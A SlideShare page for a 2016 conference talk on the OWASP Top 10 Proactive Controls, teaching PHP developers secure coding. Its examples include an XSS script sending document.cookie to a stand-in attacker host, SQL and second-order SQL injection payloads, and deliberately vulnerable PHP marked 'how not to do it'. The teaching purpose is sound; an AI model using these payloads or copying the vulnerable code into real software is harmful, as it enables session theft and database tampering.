SlideShare a Scribd company logo

OWASP Top 10 Proactive Controls

Download as PPTX, PDF
K
Katy Anton

Cyber attacks are a real and growing threat to businesses and an increasing number of attacks take place at application layer. The best defence against is to develop applications where security is incorporated as part of the software development lifecycle. The OWASP Top 10 Proactive Controls project is designed to integrate security in the software development lifecycle. In this special presentation for PHPNW, based on v2.0 released this year, you will learn how to incorporate security into your software projects. Recommended to all developers who want to learn the security techniques that can help them build more secure applications.

Technology
1 of 55
OWASP Top 10 Proactive Controls Katy Anton @katyanton October 2016 1 PHPNW16
OWASP Top 10 Risks - 2013 A1 - Injection A2 - Broken Authentication and Session Management A3 - Cross Site Scripting ( XSS ) A4 - Insecure Direct Object References A5 - Security Misconfiguration A6 - Sensitive Data Exposure A7 - Missing Function Level Access Control A8 - Cross-Site Request Forgery (CSRF) A9 - Using Components with Known Vulnerabilities A10- Unvalidated Redirects and Forwards 2
Katy Anton • Software development background • Certified Secure Software Lifecycle Professional (CSSLP) • Application Security Consultant @Veracode • OWASP Bristol Chapter Leader • Project Co-Leader for OWASP Top 10 Proactive Controls @katyanton https://www.linkedin.com/in/katyanton
Cyber attacks 2015 - 2016 4 Symfony implementation Disclosure of information SQL Injection
New Website 5
OWASP Application Security Verification Standard (ASVS) 6
C1. Verify for Security Early and Often 7 • Choose the level of security for your application • Security requirements and tests - OWASP ASVS • Verify for Security Early and Often (OWASP ZAP - continuous integration )
8 Proactive Control Risks prevented C1.Verify for security early and often All OWASP Top 10 Risks!
SQL injection example 9 $email=‘;- - @owasp.org; $sql = UPDATE user set email=‘$email’ WHERE id=‘1’; $sql = UPDATE user SET email=‘'; -- @owasp.org' WHERE id=‘1’; Becomes
C2. Parameterize Queries 10 Parameterize Queries prevent untrusted input from being interpreted as part of a SQL command.
PHP: <?php $stmt = $dbh->prepare(”Update users set email = $_GET[‘email’] where id=$id”); $stmt->execute(); Example of Query Parametrisation C2. Control: Data Access Layer 11 How not to do it !
C2: How NOT to $sql = ”Update users set email=$_GET[‘email’] where id=$id” This one string combines both the code and the input. SQL parser cannot differentiate between code and user input. 12
C2. Control: Data Access Layer 13 PHP: Query Parametrization - Correct Usage <?php $stmt = $dbh->prepare(”Update users set email=:new_email where id=:user_id”); $stmt->bindParam(':new_email', $email’); $stmt->bindParam(':user_id', $id); $stmt->execute();
14 Proactive Control Risks prevented C2.Parameterize Queries A1. Injection
XSS example 15 <script type=“text/javascript”> var adr = ‘http://evilwebsite.com/send.php?cakemonster =‘ + escape(document.cookie); var img = new Image(); img.src = adr; </script>
C3. Encode Your Output 16
C3: Controls - Contextual Encoding Symfony 2+ Twig ZF2 ZendEscaper 17
18 Proactive Control Risks prevented C3. Encode Output A1. Injection A3. XSS
C4. Validate All Input 19
C4: Example of Validations 20 • GET / POST data (including hidden fields ) • File uploads • HTTP Headers • Cookies • Database
C4: Controls 21 PHP filter extension, available as standard since v5.2 Example of both validation and sanitisation : <?php $sanitised_url = filter_var($url, FILTER_SANITIZE_URL); if (filter_var($sanitised_url, FILTER_VALIDATE_URL)) { echo “This is a valid URL.”; }
Input Validation Prevents 2nd Order SQL Injection Register form • Two users : “john” and “john’ - - “ • Username value “john’ –-” becomes the sql injection payload 22 john’- -Username Password
Change password form: Logged as john’ - - 2nd Order SQL Injection Example 23 Current Password New Password New Password
2nd Order SQL Injection Example UPDATE users SET password='123 ' WHERE username='john'--' and password=‘abc' UPDATE users SET password='123 ' WHERE username='john' 24 Becomes
25 Proactive Control Risks prevented C4. Validate All Input A1. Injection A3. XSS A10. Unvalidated redirects & forwards
New Website 26 C1 Verify for Security Early and Often C3 Encode Data C4 Validate Input C2 Parametrize Queries
C5. Implement Identity and Authentication Control 27
C5: Best practices • Secure Password Storage • Multi-Factor Authentication • Secure Password Recovery Mechanism • Transmit sensitive data only over TLS (v1.2) • Error Messages • Prevent Brute-Force Attacks 28
C5. PHP Password storage • password_hash(“my_password”) • since php v5.5 • compatibility library for versions <5.5 29
C5. Password storage – How Not To $password=bcrypt([salt] + [password], work_factor); $loginkey =md5(lc([username]).”::”.lc([password])) Be consistent when storing sensitive data! 30
C5. Forgot Password Forgot password design: 1). Ask one or more security questions 2). Send the user a randomly generated token 3). Verify token in same web session. 4). Change password. Resources https://www.owasp.org/index.php/Forgot_Password_Cheat_Sheet 31
Error message for valid user Error messages = be identical on both HTTP and HTML. How not to do it ! Error message for not-registered user C5. Error messages 32
33 Proactive Control Risks prevented C5. Establish Identity and Authentication Controls A2. Broken Authentication and Session Management
C6. Implement Appropriate Access Controls 34
C6: Best Practices • Deny by default • Least privilege • Force all requests to go through access control checks • Check on the server when each function is accessed 35
C6: Role vs Resource based ACLs Resource based if (user.isPermitted("project:view:123")) { //show the project report button } else { //don't show the button } 36 Role based if (user.hasRole("Project Manager") ) { //show the project report button } else { //don't show the button } if (user.hasRole("Project Manager") || user.hasRole("Admin") ) { //show the project report button } else { //don't show the button }
37 Proactive Control Risks prevented C6: Implement Appropriate Access Controls A4. Insecure Direct Object References A7. Missing Function Level Access Control
C7. Protect Data 38
C7 Controls: Data in transit Data in transit: HTTPS • Confidentiality: Spy cannot view your data • Integrity: Spy cannot change your data • Authenticity: Server you visit is the right one 39 MITM Protection - HSTS • HTTPS + Strict Transport Security Header
C7 Controls: Data at rest 1. Algorithm •AES (Advanced Encryption Standard ) 2. Secure key management 3. Adequate access controls and auditing 40
41 Proactive Control Risks prevented C7: Protect Data A6. Sensitive Data Exposure
New Website 42 C1 Verify for Security Early and Often C3 Encode Data C4 Validate Input C6 Access Controls C5 Authentication C7 Protect Data C2 Parametrize Queries
C8. Implement Logging and Intrusion Detection 43
44 Proactive Control Risks prevented C8.Logging and Intrusion Detection All OWASP Top 10 Risks!
C9. Leverage Security Frameworks and Libraries 45
C9: Examples • Framework with CSRF protection • Framework with XSS protection • ORM - SQL injection prevention • Vetted Cryptographic algorithm 46
C9: Best Practices  Use trusted sources  Low-coupling (Low-coupling == reduced attack surface)  Update regularly / replace 47
48 Proactive Control Risks prevented C9. Leverage Security All OWASP Top 10 Risks!
C10. Error and Exception Handling 49
C10: Best Practices  Centralised error handling  Verbose enough to explain the issue  Don’t leak critical information 50
51 Proactive Control Risks prevented C10. Error and Exception Handling All OWASP Top 10 Risks!
New Website 52 C1 Verify for Security Early and Often C3 Encode Data C4 Validate Input C6 Access Controls C5 Authentication C7 Protect Data C10 Error Handling C8 Logging C2 Parametrize Queries C9 Leverage security
It’s a Start To Secure Software by Default! 53
Reference OWASP Proactive Controls Project: https://www.owasp.org/index.php/OWASP _Proactive_Controls 54
Thank you 55

Recommended

Secure code practices
Secure code practicesSecure code practices
Secure code practices
Hina Rawal
 
OWASP Top 10 2021 What's New
OWASP Top 10 2021 What's NewOWASP Top 10 2021 What's New
OWASP Top 10 2021 What's New
Michael Furman
 
API Security Fundamentals
API Security FundamentalsAPI Security Fundamentals
API Security Fundamentals
José Haro Peralta
 
Mobile App Security Testing -2
Mobile App Security Testing -2Mobile App Security Testing -2
Mobile App Security Testing -2
Krisshhna Daasaarii
 
Web Application Penetration Testing Introduction
Web Application Penetration Testing IntroductionWeb Application Penetration Testing Introduction
Web Application Penetration Testing Introduction
gbud7
 
Security Training: #3 Threat Modelling - Practices and Tools
Security Training: #3 Threat Modelling - Practices and ToolsSecurity Training: #3 Threat Modelling - Practices and Tools
Security Training: #3 Threat Modelling - Practices and Tools
Yulian Slobodyan
 
Distributed Immutable Ephemeral - New Paradigms for the Next Era of Security
Distributed Immutable Ephemeral - New Paradigms for the Next Era of SecurityDistributed Immutable Ephemeral - New Paradigms for the Next Era of Security
Distributed Immutable Ephemeral - New Paradigms for the Next Era of Security
Sounil Yu
 
Owasp top 10
Owasp top 10Owasp top 10
Owasp top 10
YasserElsnbary
 

Recommended

Secure code practices
Secure code practicesSecure code practices
Secure code practices
Hina Rawal
 
OWASP Top 10 2021 What's New
OWASP Top 10 2021 What's NewOWASP Top 10 2021 What's New
OWASP Top 10 2021 What's New
Michael Furman
 
API Security Fundamentals
API Security FundamentalsAPI Security Fundamentals
API Security Fundamentals
José Haro Peralta
 
Mobile App Security Testing -2
Mobile App Security Testing -2Mobile App Security Testing -2
Mobile App Security Testing -2
Krisshhna Daasaarii
 
Web Application Penetration Testing Introduction
Web Application Penetration Testing IntroductionWeb Application Penetration Testing Introduction
Web Application Penetration Testing Introduction
gbud7
 
Security Training: #3 Threat Modelling - Practices and Tools
Security Training: #3 Threat Modelling - Practices and ToolsSecurity Training: #3 Threat Modelling - Practices and Tools
Security Training: #3 Threat Modelling - Practices and Tools
Yulian Slobodyan
 
Distributed Immutable Ephemeral - New Paradigms for the Next Era of Security
Distributed Immutable Ephemeral - New Paradigms for the Next Era of SecurityDistributed Immutable Ephemeral - New Paradigms for the Next Era of Security
Distributed Immutable Ephemeral - New Paradigms for the Next Era of Security
Sounil Yu
 
Owasp top 10
Owasp top 10Owasp top 10
Owasp top 10
YasserElsnbary
 
Security Testing Mobile Applications
Security Testing Mobile ApplicationsSecurity Testing Mobile Applications
Security Testing Mobile Applications
Denim Group
 
OWASP API Security Top 10 - API World
OWASP API Security Top 10 - API WorldOWASP API Security Top 10 - API World
OWASP API Security Top 10 - API World
42Crunch
 
Application Security
Application SecurityApplication Security
Application Security
Reggie Niccolo Santos
 
HTTP Security Headers Every Java Developer Must Know
HTTP Security Headers Every Java Developer Must KnowHTTP Security Headers Every Java Developer Must Know
HTTP Security Headers Every Java Developer Must Know
Ayoma Wijethunga
 
How to Test for The OWASP Top Ten
How to Test for The OWASP Top Ten How to Test for The OWASP Top Ten
How to Test for The OWASP Top Ten
Security Innovation
 
security misconfigurations
security misconfigurationssecurity misconfigurations
security misconfigurations
Megha Sahu
 
Security testing
Security testingSecurity testing
Security testing
Khizra Sammad
 
Threat modeling web application: a case study
Threat modeling web application: a case studyThreat modeling web application: a case study
Threat modeling web application: a case study
Antonio Fontes
 
Secure coding practices
Secure coding practicesSecure coding practices
Secure coding practices
Mohammed Danish Amber
 
Introduction to Web Application Penetration Testing
Introduction to Web Application Penetration TestingIntroduction to Web Application Penetration Testing
Introduction to Web Application Penetration Testing
Netsparker
 
Secure SDLC Framework
Secure SDLC FrameworkSecure SDLC Framework
Secure SDLC Framework
Rishi Kant
 
Mobile Application Security
Mobile Application SecurityMobile Application Security
Mobile Application Security
cclark_isec
 
Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020
Moataz Kamel
 
Sql Injection - Vulnerability and Security
Sql Injection - Vulnerability and SecuritySql Injection - Vulnerability and Security
Sql Injection - Vulnerability and Security
Sandip Chaudhari
 
How MITRE ATT&CK helps security operations
How MITRE ATT&CK helps security operationsHow MITRE ATT&CK helps security operations
How MITRE ATT&CK helps security operations
Sergey Soldatov
 
Web Application Penetration Tests - Information Gathering Stage
Web Application Penetration Tests - Information Gathering StageWeb Application Penetration Tests - Information Gathering Stage
Web Application Penetration Tests - Information Gathering Stage
Netsparker
 
Secure Coding principles by example: Build Security In from the start - Carlo...
Secure Coding principles by example: Build Security In from the start - Carlo...Secure Coding principles by example: Build Security In from the start - Carlo...
Secure Coding principles by example: Build Security In from the start - Carlo...
Codemotion
 
Cyber security(2018 updated)
Cyber security(2018 updated)Cyber security(2018 updated)
Cyber security(2018 updated)
PrabhatChoudhary11
 
Web application security
Web application securityWeb application security
Web application security
Kapil Sharma
 
Building Security Operation Center
Building Security Operation CenterBuilding Security Operation Center
Building Security Operation Center
S.E. CTS CERT-GOV-MD
 
2013 OWASP Top 10
2013 OWASP Top 102013 OWASP Top 10
2013 OWASP Top 10
bilcorry
 
Top 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesTop 10 Web Security Vulnerabilities
Top 10 Web Security Vulnerabilities
Carol McDonald
 

More Related Content

What's hot

Security Testing Mobile Applications
Security Testing Mobile ApplicationsSecurity Testing Mobile Applications
Security Testing Mobile Applications
Denim Group
 
OWASP API Security Top 10 - API World
OWASP API Security Top 10 - API WorldOWASP API Security Top 10 - API World
OWASP API Security Top 10 - API World
42Crunch
 
How to Test for The OWASP Top Ten
How to Test for The OWASP Top Ten How to Test for The OWASP Top Ten
How to Test for The OWASP Top Ten
Security Innovation
 

What's hot (20)

Security Testing Mobile Applications
Security Testing Mobile ApplicationsSecurity Testing Mobile Applications
Security Testing Mobile Applications
 
OWASP API Security Top 10 - API World
OWASP API Security Top 10 - API WorldOWASP API Security Top 10 - API World
OWASP API Security Top 10 - API World
 
Application Security
Application SecurityApplication Security
Application Security
 
HTTP Security Headers Every Java Developer Must Know
HTTP Security Headers Every Java Developer Must KnowHTTP Security Headers Every Java Developer Must Know
HTTP Security Headers Every Java Developer Must Know
 
How to Test for The OWASP Top Ten
How to Test for The OWASP Top Ten How to Test for The OWASP Top Ten
How to Test for The OWASP Top Ten
 
security misconfigurations
security misconfigurationssecurity misconfigurations
security misconfigurations
 
Security testing
Security testingSecurity testing
Security testing
 
Threat modeling web application: a case study
Threat modeling web application: a case studyThreat modeling web application: a case study
Threat modeling web application: a case study
 
Secure coding practices
Secure coding practicesSecure coding practices
Secure coding practices
 
Introduction to Web Application Penetration Testing
Introduction to Web Application Penetration TestingIntroduction to Web Application Penetration Testing
Introduction to Web Application Penetration Testing
 
Secure SDLC Framework
Secure SDLC FrameworkSecure SDLC Framework
Secure SDLC Framework
 
Mobile Application Security
Mobile Application SecurityMobile Application Security
Mobile Application Security
 
Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020
 
Sql Injection - Vulnerability and Security
Sql Injection - Vulnerability and SecuritySql Injection - Vulnerability and Security
Sql Injection - Vulnerability and Security
 
How MITRE ATT&CK helps security operations
How MITRE ATT&CK helps security operationsHow MITRE ATT&CK helps security operations
How MITRE ATT&CK helps security operations
 
Web Application Penetration Tests - Information Gathering Stage
Web Application Penetration Tests - Information Gathering StageWeb Application Penetration Tests - Information Gathering Stage
Web Application Penetration Tests - Information Gathering Stage
 
Secure Coding principles by example: Build Security In from the start - Carlo...
Secure Coding principles by example: Build Security In from the start - Carlo...Secure Coding principles by example: Build Security In from the start - Carlo...
Secure Coding principles by example: Build Security In from the start - Carlo...
 
Cyber security(2018 updated)
Cyber security(2018 updated)Cyber security(2018 updated)
Cyber security(2018 updated)
 
Web application security
Web application securityWeb application security
Web application security
 
Building Security Operation Center
Building Security Operation CenterBuilding Security Operation Center
Building Security Operation Center
 

Viewers also liked

OWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application VulnerabilitiesOWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application Vulnerabilities
Software Guru
 

Viewers also liked (10)

2013 OWASP Top 10
2013 OWASP Top 102013 OWASP Top 10
2013 OWASP Top 10
 
Top 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesTop 10 Web Security Vulnerabilities
Top 10 Web Security Vulnerabilities
 
OWASP Mobile Top 10
OWASP Mobile Top 10OWASP Mobile Top 10
OWASP Mobile Top 10
 
State of OWASP 2015
State of OWASP 2015State of OWASP 2015
State of OWASP 2015
 
OWASP Top 10 A4 – Insecure Direct Object Reference
OWASP Top 10 A4 – Insecure Direct Object ReferenceOWASP Top 10 A4 – Insecure Direct Object Reference
OWASP Top 10 A4 – Insecure Direct Object Reference
 
RSA Europe 2013 OWASP Training
RSA Europe 2013 OWASP TrainingRSA Europe 2013 OWASP Training
RSA Europe 2013 OWASP Training
 
OWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application VulnerabilitiesOWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application Vulnerabilities
 
Secure Software Development Adoption Strategy
Secure Software Development Adoption StrategySecure Software Development Adoption Strategy
Secure Software Development Adoption Strategy
 
OWASP Top 10 Proactive Control 2016 (C5-C10)
OWASP Top 10 Proactive Control 2016 (C5-C10)OWASP Top 10 Proactive Control 2016 (C5-C10)
OWASP Top 10 Proactive Control 2016 (C5-C10)
 
OWASP Day - OWASP Day - Lets secure!
OWASP Day - OWASP Day - Lets secure! OWASP Day - OWASP Day - Lets secure!
OWASP Day - OWASP Day - Lets secure!
 

Similar to OWASP Top 10 Proactive Controls

Wakanda and the top 5 security risks - JS.everyrwhere(2012) Europe
Wakanda and the top 5 security risks - JS.everyrwhere(2012) EuropeWakanda and the top 5 security risks - JS.everyrwhere(2012) Europe
Wakanda and the top 5 security risks - JS.everyrwhere(2012) Europe
Alexandre Morgaut
 
How to avoid top 10 security risks in Java EE applications and how to avoid them
How to avoid top 10 security risks in Java EE applications and how to avoid themHow to avoid top 10 security risks in Java EE applications and how to avoid them
How to avoid top 10 security risks in Java EE applications and how to avoid them
Masoud Kalali
 

Similar to OWASP Top 10 Proactive Controls (20)

Owasp top-ten-mapping-2015-05-lwc
Owasp top-ten-mapping-2015-05-lwcOwasp top-ten-mapping-2015-05-lwc
Owasp top-ten-mapping-2015-05-lwc
 
The path of secure software by Katy Anton
The path of secure software by Katy AntonThe path of secure software by Katy Anton
The path of secure software by Katy Anton
 
Api days 2018 - API Security by Sqreen
Api days 2018 - API Security by SqreenApi days 2018 - API Security by Sqreen
Api days 2018 - API Security by Sqreen
 
Wakanda and the top 5 security risks - JS.everyrwhere(2012) Europe
Wakanda and the top 5 security risks - JS.everyrwhere(2012) EuropeWakanda and the top 5 security risks - JS.everyrwhere(2012) Europe
Wakanda and the top 5 security risks - JS.everyrwhere(2012) Europe
 
OWASP top 10-2013
OWASP top 10-2013OWASP top 10-2013
OWASP top 10-2013
 
How to avoid top 10 security risks in Java EE applications and how to avoid them
How to avoid top 10 security risks in Java EE applications and how to avoid themHow to avoid top 10 security risks in Java EE applications and how to avoid them
How to avoid top 10 security risks in Java EE applications and how to avoid them
 
Hacking 101 (Session 2)
Hacking 101 (Session 2)Hacking 101 (Session 2)
Hacking 101 (Session 2)
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applications
 
Securing SAP in 5 steps
Securing SAP in 5 stepsSecuring SAP in 5 steps
Securing SAP in 5 steps
 
Attques web
Attques webAttques web
Attques web
 
SecDevOps for API Security
SecDevOps for API SecuritySecDevOps for API Security
SecDevOps for API Security
 
Css sf azure_8-9-17-protecting_web_apps_stephen coty_al
Css sf azure_8-9-17-protecting_web_apps_stephen coty_alCss sf azure_8-9-17-protecting_web_apps_stephen coty_al
Css sf azure_8-9-17-protecting_web_apps_stephen coty_al
 
CSS17: Houston - Protecting Web Apps
CSS17: Houston - Protecting Web AppsCSS17: Houston - Protecting Web Apps
CSS17: Houston - Protecting Web Apps
 
Operationalizing Multi Cluster Istio_ Lessons Learned and Developing Ambient ...
Operationalizing Multi Cluster Istio_ Lessons Learned and Developing Ambient ...Operationalizing Multi Cluster Istio_ Lessons Learned and Developing Ambient ...
Operationalizing Multi Cluster Istio_ Lessons Learned and Developing Ambient ...
 
Web Application Penetration Test
Web Application Penetration TestWeb Application Penetration Test
Web Application Penetration Test
 
EMEA Airheads - Configuring different APIs in Aruba 8.x
EMEA Airheads - Configuring different APIs in Aruba 8.x EMEA Airheads - Configuring different APIs in Aruba 8.x
EMEA Airheads - Configuring different APIs in Aruba 8.x
 
Securing Microservices using Play and Akka HTTP
Securing Microservices using Play and Akka HTTPSecuring Microservices using Play and Akka HTTP
Securing Microservices using Play and Akka HTTP
 
Using Splunk for Information Security
Using Splunk for Information SecurityUsing Splunk for Information Security
Using Splunk for Information Security
 
Using Splunk for Information Security
Using Splunk for Information SecurityUsing Splunk for Information Security
Using Splunk for Information Security
 
Web hackingtools 2015
Web hackingtools 2015Web hackingtools 2015
Web hackingtools 2015
 

Recently uploaded

TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
Delhi Call girls
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
Enterprise Knowledge
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
Puma Security, LLC
 

Recently uploaded (20)

What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CV
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
 
A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
Advantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessAdvantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your Business
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slides
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
 

OWASP Top 10 Proactive Controls

  • 1. OWASP Top 10 Proactive Controls Katy Anton @katyanton October 2016 1 PHPNW16
  • 2. OWASP Top 10 Risks - 2013 A1 - Injection A2 - Broken Authentication and Session Management A3 - Cross Site Scripting ( XSS ) A4 - Insecure Direct Object References A5 - Security Misconfiguration A6 - Sensitive Data Exposure A7 - Missing Function Level Access Control A8 - Cross-Site Request Forgery (CSRF) A9 - Using Components with Known Vulnerabilities A10- Unvalidated Redirects and Forwards 2
  • 3. Katy Anton • Software development background • Certified Secure Software Lifecycle Professional (CSSLP) • Application Security Consultant @Veracode • OWASP Bristol Chapter Leader • Project Co-Leader for OWASP Top 10 Proactive Controls @katyanton https://www.linkedin.com/in/katyanton
  • 4. Cyber attacks 2015 - 2016 4 Symfony implementation Disclosure of information SQL Injection
  • 7. C1. Verify for Security Early and Often 7 • Choose the level of security for your application • Security requirements and tests - OWASP ASVS • Verify for Security Early and Often (OWASP ZAP - continuous integration )
  • 8. 8 Proactive Control Risks prevented C1.Verify for security early and often All OWASP Top 10 Risks!
  • 9. SQL injection example 9 $email=‘;- - @owasp.org; $sql = UPDATE user set email=‘$email’ WHERE id=‘1’; $sql = UPDATE user SET email=‘'; -- @owasp.org' WHERE id=‘1’; Becomes
  • 10. C2. Parameterize Queries 10 Parameterize Queries prevent untrusted input from being interpreted as part of a SQL command.
  • 11. PHP: <?php $stmt = $dbh->prepare(”Update users set email = $_GET[‘email’] where id=$id”); $stmt->execute(); Example of Query Parametrisation C2. Control: Data Access Layer 11 How not to do it !
  • 12. C2: How NOT to $sql = ”Update users set email=$_GET[‘email’] where id=$id” This one string combines both the code and the input. SQL parser cannot differentiate between code and user input. 12
  • 13. C2. Control: Data Access Layer 13 PHP: Query Parametrization - Correct Usage <?php $stmt = $dbh->prepare(”Update users set email=:new_email where id=:user_id”); $stmt->bindParam(':new_email', $email’); $stmt->bindParam(':user_id', $id); $stmt->execute();
  • 14. 14 Proactive Control Risks prevented C2.Parameterize Queries A1. Injection
  • 15. XSS example 15 <script type=“text/javascript”> var adr = ‘http://evilwebsite.com/send.php?cakemonster =‘ + escape(document.cookie); var img = new Image(); img.src = adr; </script>
  • 16. C3. Encode Your Output 16
  • 17. C3: Controls - Contextual Encoding Symfony 2+ Twig ZF2 ZendEscaper 17
  • 18. 18 Proactive Control Risks prevented C3. Encode Output A1. Injection A3. XSS
  • 19. C4. Validate All Input 19
  • 20. C4: Example of Validations 20 • GET / POST data (including hidden fields ) • File uploads • HTTP Headers • Cookies • Database
  • 21. C4: Controls 21 PHP filter extension, available as standard since v5.2 Example of both validation and sanitisation : <?php $sanitised_url = filter_var($url, FILTER_SANITIZE_URL); if (filter_var($sanitised_url, FILTER_VALIDATE_URL)) { echo “This is a valid URL.”; }
  • 22. Input Validation Prevents 2nd Order SQL Injection Register form • Two users : “john” and “john’ - - “ • Username value “john’ –-” becomes the sql injection payload 22 john’- -Username Password
  • 23. Change password form: Logged as john’ - - 2nd Order SQL Injection Example 23 Current Password New Password New Password
  • 24. 2nd Order SQL Injection Example UPDATE users SET password='123 ' WHERE username='john'--' and password=‘abc' UPDATE users SET password='123 ' WHERE username='john' 24 Becomes
  • 25. 25 Proactive Control Risks prevented C4. Validate All Input A1. Injection A3. XSS A10. Unvalidated redirects & forwards
  • 26. New Website 26 C1 Verify for Security Early and Often C3 Encode Data C4 Validate Input C2 Parametrize Queries
  • 27. C5. Implement Identity and Authentication Control 27
  • 28. C5: Best practices • Secure Password Storage • Multi-Factor Authentication • Secure Password Recovery Mechanism • Transmit sensitive data only over TLS (v1.2) • Error Messages • Prevent Brute-Force Attacks 28
  • 29. C5. PHP Password storage • password_hash(“my_password”) • since php v5.5 • compatibility library for versions <5.5 29
  • 30. C5. Password storage – How Not To $password=bcrypt([salt] + [password], work_factor); $loginkey =md5(lc([username]).”::”.lc([password])) Be consistent when storing sensitive data! 30
  • 31. C5. Forgot Password Forgot password design: 1). Ask one or more security questions 2). Send the user a randomly generated token 3). Verify token in same web session. 4). Change password. Resources https://www.owasp.org/index.php/Forgot_Password_Cheat_Sheet 31
  • 32. Error message for valid user Error messages = be identical on both HTTP and HTML. How not to do it ! Error message for not-registered user C5. Error messages 32
  • 33. 33 Proactive Control Risks prevented C5. Establish Identity and Authentication Controls A2. Broken Authentication and Session Management
  • 35. C6: Best Practices • Deny by default • Least privilege • Force all requests to go through access control checks • Check on the server when each function is accessed 35
  • 36. C6: Role vs Resource based ACLs Resource based if (user.isPermitted("project:view:123")) { //show the project report button } else { //don't show the button } 36 Role based if (user.hasRole("Project Manager") ) { //show the project report button } else { //don't show the button } if (user.hasRole("Project Manager") || user.hasRole("Admin") ) { //show the project report button } else { //don't show the button }
  • 37. 37 Proactive Control Risks prevented C6: Implement Appropriate Access Controls A4. Insecure Direct Object References A7. Missing Function Level Access Control
